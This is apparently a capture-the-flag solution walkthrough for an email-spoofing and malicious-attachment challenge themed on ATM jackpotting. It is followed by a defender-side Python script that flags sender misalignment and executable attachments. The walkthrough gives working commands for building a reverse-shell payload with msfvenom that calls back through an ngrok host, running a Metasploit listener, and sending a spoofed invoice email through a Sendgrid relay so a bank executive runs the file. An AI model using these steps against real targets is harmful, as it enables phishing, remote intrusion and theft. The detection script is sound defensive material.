Solution: Email Spoof - Malicious Attachments (ATM Jackpotting)

Tools Used:
- Kali Linux: Metasploit / msfvenom
- Kali Linux: sendEmail command line email client
- SMTP Server (we use Sendgrid)
The big picture:
- We'll expose our local machine's port 80 to the internet via Ngrok.
- We'll create our malicious attachment with Metasploit / msfvenom
- We'll setup a Sendgrid SMTP relay, and then use that to send our email via the sendEmail command line email client.
Expose our machine's port 80 to internet with Ngrok

This part's pretty easy. Go to https://ngrok.com/download and click download. Once downloaded, unzip it (and if necessary run `chmod +x ./ngrok`). Then execute it with:

./ngrok tcp 443

You'll see an ngrok status screen come up, and it will show you your URL and port. Note down the URL and port, as we'll be needing them soon - for example, mine was tcp://0.tcp.ngrok.io:19358
Metasploit / msfvenom: Generate malicious attachment

msfvenom --platform linux -p linux/x64/shell/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19358 -b "\x00" -f elf > ~/Desktop/runme

LHOST and LPORT are the IP/port you want the victim to connect to (in this case, ngrok's). Replace the LHOST and LPORT above with your own ngrok information.

chmod 755 ~/Desktop/runme

Then start the Metasploit handler that will catch the connection:

msfconsole -q -x "use exploit/multi/handler;set payload linux/x64/shell/reverse_tcp; set LHOST 127.0.0.1; set LPORT 443; run; exit -y"
Setting up an SMTP relay

First we need to get access to an SMTP relay that will let us send an email FROM our target account. The easiest way I've found to do this is with Sendgrid. You may be able to sign up directly with their free account, but what I did is use my Heroku account. In Heroku, create a new application, add Sendgrid's free tier as a resource.
You'll then need to open Sendgrid, and go to Settings / Tracking. Turn "Click Tracking" off, otherwise Sendgrid will replace all URLs in your email with theirs, and that may break things.
Now back in Heroku, if you go to the Settings tab on your application and view the Config Vars, you'll have your SENDGRID_USERNAME and SENDGRID_PASSWORD. We'll need those in a second.
Sending the email

In Kali Linux, open a terminal. We're going to be using the command below, but replacing some things.

sendEmail -u "Invoice Attached" -f ATMSupplier_EMAIL_GOES_HERE -t BankExec_EMAIL_GOES_HERE -s smtp.sendgrid.net:587 -xu SENDGRID_USERNAME_GOES_HERE -xp SENDGRID_PASSWORD_GOES_HERE -m "Your invoice is attached." -a "/root/Desktop/runme"

In the above, replace BankExec_EMAIL_GOES_HERE and ATMSupplier_EMAIL_GOES_HERE with the appropriate email addresses from the challenge scope. Replace SENDGRID_USERNAME_GOES_HERE and SENDGRID_PASSWORD_GOES_HERE with the values you obtained from Sendgrid. Then... just hit enter and send that email. You should see a success message that Sendgrid's SMTP server accepted and sent the email.
Soon your attachment will be executed by Bank Exec, and a shell will be popped for you. Open the shell and read the file containing the flag.
To get a nicer command prompt, you can use this in the shell that is popped:
python -c "import pty; pty.spawn('/bin/bash');"
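The message this walkthrough sends has two traits a receiving mail gateway can key on: the header From claims the supplier's domain while the envelope sender and relay belong to a third-party SMTP service (so DMARC alignment fails), and the attachment is a bare ELF binary with no extension. The script below is an added example written for this page from the defender's side; it is not code from the challenge or from any of the tools above. It builds a constructed sample message (hypothetical domains such as atm-supplier.example and relay-provider.example, a fake relay IP) with Python's standard email library, then triages it: From/Return-Path alignment, SPF/DKIM/DMARC verdicts from an Authentication-Results header, and executable magic bytes in attachments.

```python
"""Triage a raw RFC 5322 message for the spoofing pattern above: From header
claiming one organisation, envelope sender/relay from another, and an
executable attachment. Constructed example; domains and IPs are hypothetical."""
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from email.utils import parseaddr

# Leading bytes that identify common executable formats.
EXEC_MAGIC = {
    b"\x7fELF": "ELF executable",
    b"MZ": "Windows PE executable",
    b"#!": "script with shebang",
}


def build_sample_message(spoofed: bool = True) -> bytes:
    """Constructed sample. spoofed=True mimics an 'Invoice Attached' mail
    relayed through a third-party SMTP service; spoofed=False is a benign
    invoice sent from the supplier's own mail server."""
    msg = EmailMessage()
    msg["From"] = "billing@atm-supplier.example"
    msg["To"] = "exec@bank.example"
    msg["Subject"] = "Invoice Attached"
    msg.set_content("Your invoice is attached.")
    if spoofed:
        msg["Return-Path"] = "<bounces+1234@relay-provider.example>"
        msg["Received"] = "from mail.relay-provider.example ([203.0.113.10]) by mx.bank.example"
        msg["Authentication-Results"] = (
            "mx.bank.example; spf=pass smtp.mailfrom=relay-provider.example; "
            "dkim=none; dmarc=fail header.from=atm-supplier.example")
        # Minimal ELF header: magic, class/encoding/version, padding, e_type, e_machine.
        payload = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"\x02\x00\x3e\x00"
        msg.add_attachment(payload, maintype="application",
                           subtype="octet-stream", filename="runme")
    else:
        msg["Return-Path"] = "<bounces@atm-supplier.example>"
        msg["Received"] = "from mail.atm-supplier.example ([198.51.100.5]) by mx.bank.example"
        msg["Authentication-Results"] = (
            "mx.bank.example; spf=pass smtp.mailfrom=atm-supplier.example; "
            "dkim=pass header.d=atm-supplier.example; dmarc=pass header.from=atm-supplier.example")
        msg.add_attachment(b"%PDF-1.4\n%...", maintype="application",
                           subtype="pdf", filename="invoice.pdf")
    return msg.as_bytes()


def org_domain(domain: str) -> str:
    """Crude registrable-domain approximation (last two labels); a real
    gateway would consult the public suffix list instead."""
    return ".".join(domain.lower().split(".")[-2:])


def analyze(raw: bytes) -> dict:
    """Return alignment, authentication and attachment findings for one message."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    from_domain = parseaddr(str(msg.get("From", "")))[1].rpartition("@")[2].lower()
    rp_domain = parseaddr(str(msg.get("Return-Path", "")))[1].rpartition("@")[2].lower()

    # Header From vs envelope sender: the alignment check DMARC formalises.
    if rp_domain and org_domain(rp_domain) != org_domain(from_domain):
        findings.append(f"From domain {from_domain} not aligned with envelope sender {rp_domain}")

    # Verdicts recorded by the receiving MX in Authentication-Results.
    auth_header = str(msg.get("Authentication-Results", ""))
    auth = {}
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth_header)
        auth[mech] = m.group(1).lower() if m else "none"
        if auth[mech] != "pass":
            findings.append(f"{mech} result is {auth[mech]}")

    # Attachments: executable magic bytes and extension-less names.
    attachments = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""
        kind = next((label for magic, label in EXEC_MAGIC.items()
                     if data.startswith(magic)), None)
        attachments.append({"name": name, "bytes": len(data), "type": kind})
        if kind:
            findings.append(f"attachment {name!r} is a {kind}")
        if "." not in name:
            findings.append(f"attachment {name!r} has no file extension")

    return {"from_domain": from_domain, "return_path_domain": rp_domain,
            "auth": auth, "attachments": attachments,
            "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    for label, flag in (("spoofed", True), ("benign", False)):
        report = analyze(build_sample_message(spoofed=flag))
        print(f"{label}: suspicious={report['suspicious']}")
        for f in report["findings"]:
            print("  -", f)
```

On the spoofed sample the report flags the From/Return-Path mismatch, the dkim=none and dmarc=fail verdicts, and the extension-less ELF attachment; the benign sample produces no findings. The same checks apply to a real message dumped from a mail spool with `analyze(open(path, "rb").read())`.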